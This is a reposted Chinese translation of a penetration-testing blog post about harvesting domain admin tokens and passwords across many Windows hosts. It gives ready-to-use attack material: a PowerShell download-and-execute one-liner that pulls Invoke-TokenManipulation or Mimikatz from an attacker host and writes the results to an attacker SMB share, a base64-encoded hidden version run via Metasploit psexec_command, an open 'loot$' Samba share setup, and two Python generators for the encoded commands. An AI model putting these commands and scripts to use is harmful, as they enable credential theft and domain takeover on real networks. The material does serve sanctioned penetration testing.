Account Hunting for Invoke-TokenManipulation 伪造token前的账号猎取

时间：2015-02-02 19:55:40 阅读：283 评论：0 收藏：0 [点我收藏+]

标签：

source: https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/

I’ve been searching quite a while now for the best way to search for domain admin tokens, once admin rights are attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that have a domain admin kerberos security token still loaded in memory. There are a couple of “Token_Hunter” post modules, but you need to have a shell on the systems to run them, which can take a long time to establish, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.

在渗透测试中，得到一些admin权限后，寡人都会寻找搜索域管理员令牌的最好办法。通常情况下，我在metasploit里运行“psexec_loggedin_users，j结果输出到一个文件，然后egrep出“域管理员”组的用户。这往往是有效的，但要是有个域管理员Kerberos安全令牌仍然在内存中加载，俺们就要错过他了。这有一组“token_hunter”后的模块，你需要有个shell来运行它们，这需要很长时间才能建立，隐藏负载，整理token。如同我爱shellz，我当然不会介意几千人回连到我的机器。所以，我想我终于从网上的文章中拼凑出个可行的方法。

The first article is from Chris Campbell posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnage, HarmJoy

第一篇文章是克里斯坎贝尔贴在pentestgeek上的。印象中，它告诉我们如何用PowerShell下载并执行一个powersploit模块。一些帖子有用invoke-mimikatz.ps1来实现，但为什么不用invoke-tokenmanipulation.ps1呢？参考资料：carnal0wnage harmjoy，

To setup the environment, I first downloaded PowerSploit to my apache directory:

要安装环境，首先我下了powersploit到Apache目录：

1
2
cd /var/www/
git clone https://github.com/mattifestation/PowerSploit.git

Then configured Samba with an open share to capture the output files:

然后配置Samba开放共享来捕获输出文件：

1

2

3

4

5

6

7

8

nano /etc/samba/smb.conf

[loot$]

comment = Loot

path = /root/loot

browseable = yes

read only = no

guest ok = yes

public = yes

Then create the folder and grant full permissions. I created a folder named “tokens” under “loot”.

Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:

然后创建文件夹授予完全权限。我在‘loot‘下创建了一个文件夹命名为“token”。

然后，我偷偷拿走戴维甘乃迪的“unicorn”脚本里的“PowerShell encoding”来编码下面的字符串：

1
IEX (New-Object Net.WebClient).DownloadString(“http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt

This will download “Invoke-TokenManipulation.ps1” from my web host, execute it within memory to enumerate tokens, and pipe the output to my SMB share into a file named as the computer.

Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.

这将从我的网站主机下载”Invoke-TokenManipulation.ps1”，在内存执行，枚举token，输出到我的SMB共享的文件夹，文件以那台计算机命名。

现在，我在metasploit里用“psexec_command”模块于所有系统中来执行我编码的字符串，然后token雨点般进入我的共享文件夹。

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

msf auxiliary(psexec_command) > info

       Name: Microsoft Windows Authenticated Administration Utility

     Module: auxiliary/admin/smb/psexec_command

    License: Metasploit Framework License (BSD)

       Rank: Normal

Provided by:

  Royce Davis @R3dy__ <rdavis@accuvant.com>

Basic options:

  Name                  Current Setting  Required  Description

  ----                  ---------------  --------  -----------

  COMMAND                                yes       The command you want to execute on the remote host

  RHOSTS                192.168.81.10    yes       The target address range or CIDR identifier

  RPORT                 445              yes       The Target port

  SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing

  SERVICE_DISPLAY_NAME                   no        The service display name

  SERVICE_NAME                           no        The service name

  SMBDomain             pwnt.com         no        The Windows domain to use for authentication

  SMBPass               LoveGoats!       no        The password for the specified username

  SMBSHARE              C$               yes       The name of a writeable share on the server

  SMBUser               TrustedSec       no        The username to authenticate as

  THREADS               255              yes       The number of concurrent threads

  WINPATH               WINDOWS          yes       The name of the remote Windows directory

Description:

  This module uses a valid administrator username and password to 

  execute an arbitrary command on one or more hosts, using a similar 

  technique than the "psexec" utility provided by SysInternals. Daisy 

  chaining commands with ‘&‘ does not work and users shouldn‘t try it. 

  This module is useful because it doesn‘t need to upload any binaries 

  to the target machine.

References:

  http://cvedetails.com/cve/1999-0504/

  http://www.osvdb.org/3106

  http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access

  http://sourceforge.net/projects/smbexec/

  http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA

command => powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA

msf auxiliary(psexec_command) > run

[*] 192.168.81.10:445 - Executing the command...

[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...

[*] checking if the file is unlocked

[*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)

[-] Command seems to still be executing. Try increasing RETRY and DELAY

[*] 192.168.81.10:445 - Getting the command output...

[*] 192.168.81.10:445 - Command finished with no output

[*] 192.168.81.10:445 - Executing cleanup...

[-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)

[-] 192.168.81.10:445 - Unable to cleanup. Maybe you‘ll need to manually remove true, false from the target.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Then, just egrep the files to enumerate any domain admins.

然后，egrep文件列举任何域管理员。

1
2
root@trustedsec4-lin:~/loot/tokens# egrep -i ‘trustedsec|admin‘ * /dev/null
PWNT-DC.txt:Username : TrustedSec

All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.

The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:

剩下的就是在系统pop个shell，模仿他们的令牌，提权域。

“encoding”的脚本很容易把mimikatz加进去以及（写进“loot$/passwords/”）。grep文件出特定用户的密码：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null

PWNT-DC.txt:User Name : TrustedSec

PWNT-DC.txt-Domain : PWNT

PWNT-DC.txt-SID : S-1-5-21-999999-88888888888-12000000000-1000

--

PWNT-DC.txt:

* Username : TrustedSec

PWNT-DC.txt-

* Domain : PWNT

PWNT-DC.txt-

* NTLM : <NTLM_HERE>

--

PWNT-DC.txt:

* Username : TrustedSec

PWNT-DC.txt-

* Domain : PWNT

PWNT-DC.txt-

* Password : LoveGoats!

脚本都在下面了. Happy Hunting!

TokenHunter.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python
 
# This download "Invoke-TokenManipulation.ps1" from the attacker‘s webhost,
# then execute the script in memory and pipe its output ot the attacker‘s SMB share
# "\\loot$\tokens\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# Script Dependency
# https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration
#
# TrustedSec
 
import base64
 
attacker_ip = "<put your IP here>"
 
# Main guts
def main():
  powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\tokens\\$env:computername.txt"
  full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode(‘utf_16_le‘))  
  print full_attack
 
# Standard boilerplate to call the main() function
if __name__ == ‘__main__‘:
  main()

PasswordHunter.py

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

#!/usr/bin/env python

# This download "Invoke-Mimikatz.ps1" from the attacker‘s webhost,

# then execute the script in memory and pipe its output ot the attacker‘s
 SMB share

# "\\loot$\passwords\".

#

# Formulated mainly from the following articles/tools

# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/

# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html

# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/

# https://github.com/trustedsec/unicorn

#

# TrustedSec

import
base64

attacker_ip
=
"<put your IP here>"

# Main guts

def
main():

  powershell_code
=
"IEX (New-Object Net.WebClient).DownloadString(\"http://"
+
attacker_ip
+
"/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");Invoke-Mimikatz
 -DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\"
+
attacker_ip
+
"\\loot$\\passwords\\$env:computername.txt"

  full_attack
=
"powershell -nop -win hidden -noni -enc "
+
base64.b64encode(powershell_code.encode(‘utf_16_le‘))  

  print
full_attack

# Standard boilerplate to call the main() function

if
__name__
==
‘__main__‘:

  main()

（我翻译完了，个人理解，这是个批量获得用户token和密码的东东）

Account Hunting for Invoke-TokenManipulation 伪造token前的账号猎取

标签：

原文地址：http://blog.csdn.net/u010211892/article/details/43412609

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行